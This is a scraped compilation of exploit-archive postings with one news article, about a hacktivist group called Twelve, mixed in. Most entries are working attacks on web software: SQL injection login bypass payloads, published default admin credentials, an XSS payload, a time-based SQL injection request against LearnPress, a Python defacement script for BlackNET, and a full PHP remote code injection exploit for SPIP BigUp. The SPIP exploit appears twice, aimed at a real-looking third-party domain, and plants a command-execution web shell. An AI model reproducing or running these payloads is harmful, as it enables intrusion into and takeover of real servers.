The BMS/BAS controller suffers from an arbitrary file deletion vulnerability. Input passed to the 'file' parameter in 'databasefiledelete.php' is not properly sanitised before being used to delete files. This can be exploited by an unauthenticated attacker to delete files with the permissions of the web server using directory traversal sequences passed within the affected POST parameter.

ABB Cylon Aspect 3.08.01 (databaseFileDelete.php) Arbitrary File Delete

Registration and Login System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Registration and Login System v1.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/User-Registration-and-login-System-with-admin-panel.zip                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/loginsystem/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Registration And Login System 1.0 SQL Injection

SPIP BigUp version 4.3.1 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.3.1 php code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP BigUp 4.3.1 Code Injection

RecipePoint version 1.9 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : RecipePoint 1.9 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/recipepoint/                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/recipepoint/adminGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

RecipePoint 1.9 Insecure Settings

A hacktivist group known as Twelve has been observed using an arsenal of publicly available tools to conduct destructive cyber attacks against Russian targets.
"Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims' data and then destroy their infrastructure with a wiper to prevent recovery," Kaspersky said in a Friday analysis.
"The approach is indicative of a

A hacktivist group known as Twelve has been observed using an arsenal of publicly available tools to conduct destructive cyber attacks against Russian targets.

"Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims' data and then destroy their infrastructure with a wiper to prevent recovery," Kaspersky said in a Friday analysis.

"The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit."

The hacking group, believed to have been formed in April 2023 following the onset of the Russo-Ukrainian war, has a track record of mounting cyber attacks that aim to cripple victim networks and disrupt business operations.

It has also been observed conducting hack-and-leak operations that exfiltrate sensitive information, which is then shared on its Telegram channel.

Kaspersky said Twelve shares infrastructural and tactical overlaps with a ransomware group called DARKSTAR (aka COMET or Shadow), raising the possibility that the two intrusion sets are likely related to one another or part of the same activity cluster.

"At the same time, whereas Twelve's actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern," the Russian cybersecurity vendor said. "This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats."

The attack chains start with gaining initial access by abusing valid local or domain accounts, after which the Remote Desktop Protocol (RDP) is used to facilitate lateral movement. Some of these attacks are also carried out via the victim's contractors.

"To do this, they gained access to the contractor's infrastructure and then used its certificate to connect to its customer's VPN," Kaspersky noted. "Having obtained access to that, the adversary can connect to the customer's systems via the Remote Desktop Protocol (RDP) and then penetrate the customer's infrastructure."

Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation. The malicious RDP connections to the system are tunneled through ngrok.

Also deployed are PHP web shells with capabilities to execute arbitrary commands, move files, or send emails. These programs, such as the WSO web shell, are readily available on GitHub.

In one incident investigated by Kaspersky, the threat actors are said to have exploited known security vulnerabilities (e.g., CVE-2021-21972 and CVE-2021-22005) in VMware vCenter to deliver a web shell that then was used to drop a backdoor dubbed FaceFish.

"To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects," it said. "To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services."

Some of the names used include "Update Microsoft," "Yandex," "YandexUpdate," and "intel.exe."

The attacks are also characterized by the use of a PowerShell script ("Sophos\_kill\_local.ps1") to terminate processes related to Sophos security software on the compromised host.

The concluding stages entail using the Windows Task Scheduler to launch ransomware and wiper payloads, but not before gathering and exfiltrating sensitive information about their victims via a file-sharing service called DropMeFiles in the form of ZIP archives.

"The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data," Kaspersky researchers said. "Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files."

The wiper, identical to the Shamoon malware, rewrites the master boot record (MBR) on connected drives and overwrites all file contents with randomly generated bytes, effectively preventing system recovery.

"The group sticks to a publicly available and familiar arsenal of malware tools, which suggests it makes none of its own," Kaspersky noted. "This makes it possible to detect and prevent Twelve's attacks in due time."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks

BlackNET version 3.7.0.0 appears to allow unauthenticated access to modify data and suffers from arbitrary file deletion and directory traversal vulnerabilities while authenticated.

    # Exploit Title: BlackNET - Multiple Vulnerabilities# Exploit Author: bRpsd# Date: 20/09/2024# Vendor Homepage: https://github.com/AndroVirus# Software Link: https://github.com/AndroVirus/BlackNET/# Version: v3.7.0.0# Tested on: MacOS - Xampp# CVE: NAimport requests# Define the target URL for the POST requestpost_url = "http://localhost/x/BlackNET/BlackNET%20Panel/post.php"# Defaces the homepagepayload = "Nothing to see here."data = {    'folder_name': 'www',  # this can create any folder on the server    'file_name': 'index.html',  # Name of the file to be created    'data': payload  # The payload being tested}# Send the POST requestresponse = requests.post(post_url, data=data)# Check the responseif response.status_code == 200:    print("Request successful. Check if 'file' was created.")else:    print(f"Request failed with status code: {response.status_code}")    # Vulnerable code: /BlackNET/BlackNET%20Panel/post.php# header('Content-type: text/html; charset=utf-8');## require_once 'config/config.php';# require_once APP_PATH . 'classes/POST.php';## if ($_SERVER['REQUEST_METHOD'] == "POST") {#  $POST = new BlackNET\POST();# $folder_name = isset($_POST['folder_name']) && $_POST['folder_name'] != "" ? $_POST['folder_name'] : 'www';#    $file_name = isset($_POST['file_name']) ? $_POST['file_name'] : "unknown.txt";##   $data = $POST->sanitize($_POST['data']);##  $POST->prepare($folder_name, $file_name, $data);## $POST->write();   ############################################################################################# Arbitrary File Deletion & Directory Traversal [Authenticated]# File: rmfile.php# Parameter: fname# Vul Code:#<?php# require_once 'session.php';#$msg = "";#$id = "";#if ($_SERVER['REQUEST_METHOD'] == "POST") {#    $files = $_POST['file'];#    $vicid = $utils->sanitize($_POST['vicid']);#    if ($auth->checkToken($_POST['csrf'], $_SESSION['csrf'])) {#        foreach ($files as $file) {#if (strpos($file, "../")) {#                $id = $vicid;#                $msg = "error";#            }#            $filename = $utils->sanitize($file);#            $real_path = realpath("upload" . "/" . $vicid . "/" . $filename);#            if (file_exists($real_path)) {#                unlink($real_path);### Proof Of Concept:# http://localhost/x/BlackNET/BlackNET%20Panel/rmfile.php?fname=../favico.png&vicid=&csrf=95a6ae14d491e482b4370da1fd74f69891058f12472e6510e373889d99d84c3c

BlackNET 3.7.0.0 Missing Authentication / File Deletion / Traversal

SPIP BigUp version 4.2.15 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.2.15 php code injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP BigUp 4.2.15 Code Injection

Taskhub version 3.0.3 suffers from an ignored default credential vulnerability.

**Taskhub 3.0.3 Insecure Settings**

Posted Sep 20, 2024

Authored by indoushka

Taskhub version 3.0.3 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 7505071b9896db1b7f4f5cd911d9d07b06247bd94dbf46777a4481d4b83f1ddd

Download | Favorite | View

**Taskhub 3.0.3 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v3.0.3 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,862)
*   Arbitrary (17,077)
*   BBS (2,859)
*   Bypass (1,923)
*   CGI (1,047)
*   Code Execution (7,902)
*   Conference (692)
*   Cracker (845)
*   CSRF (3,427)
*   DoS (25,263)
*   Encryption (2,395)
*   Exploit (54,266)
*   File Inclusion (4,274)
*   File Upload (1,017)
*   Firewall (822)
*   Info Disclosure (2,916)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,281)
*   Local (14,850)
*   Magazine (587)
*   Overflow (13,223)
*   Perl (1,435)
*   PHP (5,271)
*   Proof of Concept (2,411)
*   Protocol (3,749)
*   Python (1,660)
*   Remote (31,888)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (642)
*   Scanner (1,658)
*   Security Tool (8,048)
*   Shell (3,305)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,725)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,092)
*   Web (10,138)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,301)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,114)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,124)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (389)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,237)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,845)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,852)
*   UNIX (9,456)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Taskhub 3.0.3 Insecure Settings

Teacher Subject Allocation Management System version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Teacher Subject Allocation Management System 1.0 XSS Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] In the search box, put your payload.[+] use payload : <script>alert(/indoushka/);</script>[+] http://127.0.0.1/tsas/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Teacher Subject Allocation Management System 1.0 Cross Site Scripting

WordPress LMS plugin versions 4.2.7 and below suffer from a remote SQL injection vulnerability.

    # CVE-2024-8522LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'## Stack```txtclass-lp-db.php:702, LP_Database->execute()class-lp-course-db.php:564, LP_Course_DB->get_courses()Courses.php:241, LearnPress\Models\Courses::get_courses()class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()class-wp-rest-server.php:1063, WP_REST_Server->dispatch()class-wp-rest-server.php:439, WP_REST_Server->serve_request()rest-api.php:420, rest_api_loaded()class-wp-hook.php:324, WP_Hook->apply_filters()class-wp-hook.php:348, WP_Hook->do_action()plugin.php:565, do_action_ref_array()class-wp.php:418, WP->parse_request()class-wp.php:813, WP->main()functions.php:1336, wp()wp-blog-header.php:16, require()index.php:17, {main}()```## <>```txtSELECT <> FROM wp_posts AS p WHERE 1=1 AND p.post_type = 'lp_course' AND p.post_status IN ('publish') ORDER BY post_date DESC LIMIT 0, 10```## PoC```httpGET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1Host: localhost:8077User-Agent: curl/7.81.0Cookie: XDEBUG_SESSION=PHPSTORMAccept: */*```

Tag

#php